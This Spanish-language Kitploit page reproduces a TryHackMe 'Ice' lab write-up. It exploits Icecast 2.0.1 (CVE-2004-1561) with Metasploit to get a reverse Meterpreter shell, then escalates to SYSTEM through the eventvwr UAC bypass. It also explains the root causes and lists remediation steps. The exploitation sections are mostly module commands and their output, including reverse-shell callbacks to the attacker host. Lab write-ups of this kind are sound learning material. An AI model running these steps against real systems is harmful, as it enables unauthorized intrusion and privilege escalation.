Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
thm-ice-icecast-rce-privesc — Compromiso total de la máquina Ice de TryHackMe — RCE de Icecast 2.0.1 (CVE-2004-1561) mediante desbordamiento de búfer, seguido de escalada de privilegios en Windows mediante bypass de UAC / secuestro de COM. Incluye metodología detallada y remediación. | Kitploit
Herramientas/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

Compromiso total de la máquina Ice de TryHackMe — RCE de Icecast 2.0.1 (CVE-2004-1561) mediante desbordamiento de búfer, seguido de escalada de privilegios en Windows mediante bypass de UAC / secuestro de COM. Incluye metodología detallada y remediación.

Ver Repositorio
2hace 2 mesesAún no revisado

TryHackMe — Ice: Icecast 2.0.1 RCE y escalada de privilegios en Windows

Plataforma: TryHackMe Sistema operativo objetivo: Windows 7 / Windows Server 2008 R2 Dificultad: Fácil Categoría: Desbordamiento de búfer (RCE), escalada local de privilegios


Resumen

Este informe documenta el compromiso completo de la máquina Ice en TryHackMe, desde el reconocimiento inicial hasta la escalada de privilegios a nivel de SYSTEM. El objetivo expone un desactualizado servidor de streaming multimedia Icecast 2.0.1 vulnerable a un desbordamiento de búfer remoto (CVE-2004-1561) que permite la ejecución arbitraria de código mediante cabeceras HTTP manipuladas. El acceso inicial se obtuvo como usuario con bajos privilegios a través de una reverse shell de Meterpreter. La escalada de privilegios a NT AUTHORITY\SYSTEM se logró abusando de una vulnerabilidad de secuestro de objetos COM de Windows (bypassuac_eventvwr) que aprovecha binarios de autoelevación y la redirección de claves de registro en HKCU.

EtapaTécnicaResultado
Reconocimientoarp-scan, nmapHost identificado + 7 puertos abiertos
Acceso inicialDesbordamiento de búfer en cabeceras HTTP de Icecast (CVE-2004-1561)Sesión de Meterpreter como usuario local
Escalada de privilegiosbypassuac_eventvwr (secuestro de COM/registro)Shell como SYSTEM

1. Reconocimiento

1.1 Descubrimiento de host

Se utilizó un escaneo ARP para identificar la dirección IP del objetivo en la red local.

root@kitploit:~
arp-scan -l

Resultados del escaneo ARP y de Nmap

Objetivo identificado en 192.168.37.138.

1.2 Enumeración de puertos y servicios

Se ejecutó un escaneo SYN completo con detección de servicio/versión contra el objetivo:

root@kitploit:~
nmap -sS -sV 192.168.37.138

Resultados:

El host fue identificado como DARK-PC, una máquina Windows. El puerto 8000 con Icecast destacó como la superficie de ataque más prometedora: no es un servicio estándar de Windows y se sabe que arrastra CVE históricos.


2. Identificación de vulnerabilidades

Una búsqueda de vulnerabilidades conocidas de Icecast sacó a la luz el CVE-2004-1561:

Desbordamiento de búfer en Icecast 2.0.1 y versiones anteriores permite a atacantes remotos ejecutar código arbitrario mediante una petición HTTP con un gran número de cabeceras.

Se confirmó un módulo de Metasploit coincidente:

root@kitploit:~
search CVE-2004-1561

Búsqueda del CVE en Metasploit

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. Explotación — Acceso inicial

3.1 Causa raíz

Icecast 2.0.1 no comprueba correctamente los límites del número de cabeceras HTTP que procesa. Al enviar más cabeceras de las que el búfer del servidor puede manejar, los datos sobrantes se desbordan hacia la memoria adyacente, sobrescribiendo datos fuera del búfer reservado para el análisis de cabeceras.

En concreto, el desbordamiento corrompe la dirección de retorno guardada (EIP) en la pila — la dirección a la que la CPU vuelve cuando la función que gestiona la petición retorna. Al controlar esta dirección, un atacante puede redirigir la ejecución hacia shellcode proporcionado por el atacante en lugar del punto de retorno legítimo, lo que resulta en la ejecución arbitraria de código en el contexto del proceso de Icecast.

3.2 Configuración del módulo

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

Opciones del exploit y ejecución exitosa

3.3 Ejecución

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

Se estableció una sesión de Meterpreter como usuario con bajos privilegios.


4. Escalada de privilegios

4.1 Sugeridor de exploits local

Con una sesión activa, se utilizó el sugeridor integrado de Metasploit para identificar vías viables de escalada de privilegios locales según el nivel de parches del objetivo:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Resultados del sugeridor de exploits local

Varios módulos se marcaron como probablemente viables, incluido bypassuac_eventvwr, que apunta a hosts Windows 7 / Server 2008 R2 sin parchear.

4.2 Causa raíz — Bypass de UAC mediante secuestro de COM

Esta vía de escalada de privilegios abusa de la arquitectura COM (Component Object Model) de Windows, que permite la interoperabilidad de componentes escritos en distintos lenguajes. Los objetos COM suelen depender de DLL compartidas, y el sistema resuelve qué DLL cargar para un objeto COM dado mediante rutas del registro, incluidas rutas almacenadas bajo la colmena HKCU del usuario actual.

eventvwr.exe es un binario de Windows con autoelevación (provoca silenciosamente un aviso de elevación de UAC sin mostrarlo, debido a su manifiesto, en las configuraciones UAC predeterminadas). Cuando se ejecuta, consulta HKCU para resolver un objeto COM y cargar su DLL asociada.

El exploit secuestra esta búsqueda: escribe una clave de registro maliciosa bajo la colmena HKCU del usuario actual, haciendo que la resolución COM apunte a un payload controlado por el atacante en lugar de a la DLL legítima del sistema. Dado que eventvwr.exe se autoeleva, el payload que desencadena —en este caso un shell de comandos— se ejecuta con el nivel de integridad al que se eleva eventvwr.exe, escalando la sesión desde un usuario estándar a un contexto de mayores privilegios, sin llegar a mostrar un aviso UAC visible.

4.3 Ejecución

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

Éxito del exploit de escalada de privilegios

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

Se abrió una segunda sesión de Meterpreter con un shell elevado, que aterrizó directamente en C:\Windows\system32, lo que confirmó la escalada de privilegios.


5. Resumen de hallazgos

#HallazgoSeveridad

6. Remediación

  1. Parchear o sustituir Icecast. La versión 2.0.1 está obsoleta desde hace más de dos décadas; actualizar a la última versión mantenida o retirar el servicio si no se utiliza.
  2. Restringir la exposición de los servicios de streaming/multimedia únicamente a redes internas; no deberían ser accesibles desde Internet ni desde toda la LAN sin una necesidad empresarial clara.
  3. Aplicar las actualizaciones de Windows vigentes. El abuso de la autoelevación de eventvwr.exe se parcheó en compilaciones posteriores de Windows; este ataque no funciona contra versiones modernas de Windows totalmente actualizadas.
  4. Endurecer la configuración de UAC a "Notificar siempre" en lugar del nivel predeterminado, lo que cierra varias vías de abuso de autoelevación silenciosa.
  5. Principio de mínimo privilegio: la cuenta comprometida no debería haber formado parte del grupo local Administradores, que es lo que permitió que la técnica de bypass de UAC tuviera éxito en primer lugar.

Herramientas utilizadas

  • arp-scan, nmap — reconocimiento
  • Metasploit Framework (msfconsole) — explotación y post-explotación
  • Meterpreter — shell de post-explotación

Habilidades demostradas

  • Reconocimiento de red y enumeración de servicios
  • Investigación de CVE y correlación exploit-vulnerabilidad
  • Conceptos de explotación de corrupción de memoria / desbordamiento de búfer (sobrescritura de EIP)
  • Internals de Windows: resolución de objetos COM, secuestro de registro, mecánicas de bypass de UAC
  • Documentación completa de la cadena de ataque (reconocimiento → explotación → escalada de privilegios → remediación)
Descargar herramienta
PuertoServicioVersión
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (workgroup: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpServidor de streaming multimedia Icecast
49152–49157/tcpmsrpcMicrosoft Windows RPC
CVE / Referencia
1Desbordamiento de búfer en las cabeceras HTTP de Icecast 2.0.1 que permite ejecución remota de códigoCríticaCVE-2004-1561
2Bypass de UAC mediante secuestro de COM/registro (autoelevación de eventvwr.exe)AltaDebilidad conocida de diseño de UAC en Windows 7/Server 2008 R2